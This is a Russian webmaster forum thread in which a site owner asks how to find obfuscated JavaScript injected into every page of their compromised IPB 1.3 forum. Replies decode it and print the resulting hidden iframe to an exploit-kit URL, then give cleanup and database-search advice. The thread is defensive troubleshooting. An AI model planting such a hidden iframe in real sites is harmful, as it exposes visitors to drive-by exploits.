- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На каждой странице форума сразу после <body> идет код:
Каспер говорит, что это "нечто вроде трояна", ну как он любит. После нескольких дней мучений написал даже в лабораторию касперского и мне ответили, что это не вирус, а код счетчика LI который считает посещения другому сайту.
Так вот проблема в том, что нигде в файлах форума данного кода нет. Поставить полностью чистый движок не могу по причине криво переписанного шаблона дизайна и невозможности переписать его заново.
Посоветуйте, как выловить этот код?
Адрес пациента forum/fanfics/ru
Адрес форума тут ничем не поможет. Вредоносный код нужно ловить где-то в шаблонах. А как вы определили, что "нигде в файлах форума такого кода нет"?
Мда, в лаборатории касперского по ходу совсем идиоты сидят..
Киньте в личку пожалуйста весь JS, попробую декодировать и посмотреть, что там.
Но больше чем уверен, что там фрейм на станицу со связкой :)
UPD: Хотя не надо, хоть чуть-чуть погуглите, этот код уже ни раз в инете обсуждался ;)
Запусти по исходникам и всему текстовому материалу поиск внутри файла, и так же если есть БД, то и по ней выполни поиск.
seraphim, полнотекстовым поиском по всем файлам форума. Я искал именно данный текст, который вставлен в страницы форума. Видимо не все так просто.
Say What?, отправил, правда, суть кода - мне не так уж и важна, но буду благодарен за любую помощь :)
создаём html документ, пишем в нём:
Открываем этот документ в браузере и получаем алерт с текстом:
src="http://autodiva.ru/1.html" height="0" width="0" name="1" frameborder="0" scrolling="no" id="1" /></iframe>
Как и думал, зашифрованный iframe на связку сплоитов.
Проверьте код движка или шаблона вашего форума и удалите этот JS. Смените пароли на хостинге, фтп и т.д. и попробуйте поискать шелл у себя на сервере :) Ну и подумайте как вас могли взломать, то ли это где то уязвимость в форуме или сторонних движках установленных на вашем сервере, то ли был задействован реверс ip, ну и как вариант получили ваши пароли.
Удачи!
MJay, это реально может быть в БД записано? Попробую сегодня поискать в БД.
Say What?, как сломали знаю, шелл удалил. Не пойму какой код искать и где именно. В этом и проблема.
Нужно посмотреть, как движок собирает страницу. Вполне возможно, что этот код тянется из базы.
А код - это действительно ифрейм. Та часть вначале под анэскейпом, которую вы привели без купюр, расшифровалась так:
Что за движок у форума?
seraphim, ипб 1.3
Под Invision Power Board v1.3 Final давно уже сплоит есть с которым каждый школьник сможет разобраться :)
Я бы обновился)
Say What, оффтоп: в булке исправлять гораздо легче, чем в ипб. К слову об этом: http://s47.radikal.ru/i117/1005/b3/678704b4890d.jpg
автору темы:
скачайте дистрибутив (чистый) этой версии и сверьте файлы по размерам
посмотрите время изменения файлов
ищите в мускуле по шаблонам, используя like '%3C%69%66%72%61%6D%'